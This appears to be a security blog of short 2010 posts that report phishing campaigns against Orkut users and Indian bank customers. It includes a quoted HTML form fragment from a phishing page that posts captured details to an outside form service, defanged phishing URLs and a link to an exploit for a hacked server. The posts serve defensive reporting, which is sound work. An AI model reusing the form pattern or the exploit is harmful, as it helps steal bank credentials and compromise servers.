Thursday, January 21, 2010

Orkut Phishing ….

Here is an Orkut phishing victim

orrkut

this leads to following page hosted to free web service

orkut_start

get the user information and redirects to orkut login page , but the information goes to following guy

admin_okut - Copy

Online Phishing by Exploiting

Most of this Phishing pages are hosted to hacked server and data are send to public domain like free email and other service.

Here is the mail that take us to the Phishing page

mail

Here is a server hosting file on the server

file loaded

this server is hacked as its using outdated  software

cause

with POC code

http://www.milw0rm.com/exploits/9556

Friday, January 15, 2010

Phishing using Form Buddy !

Last Phishing page reported on  Punjab National Bank uses  the “Form Buddy” service to capture the information and redirect back to original Bank site.Here is the info found  in the pages.

<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post"> 
<input type="hidden" name="username" value="tundehsbcxxxxxx">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value="http://www.pnbindia.com">


 


its been reported to Form Buddy.

More Phishing ……….

We had couple of Phishing incident reported today here are they

hxxp://searchindiaonline.com/bank-india/ing/INGBanner.html – ING phishing

directs to

image

hxxp://netpnbsecuritysystem.t35.com/netpnb/ – PNB bank

site loaded by above link

image

APK spam on Whatsapp Targeting Bank users

  Initial vector:   Whatsapp spam user posing as union bank with logo in user profile shared apk file named as “Union Bank Aadhaar Update....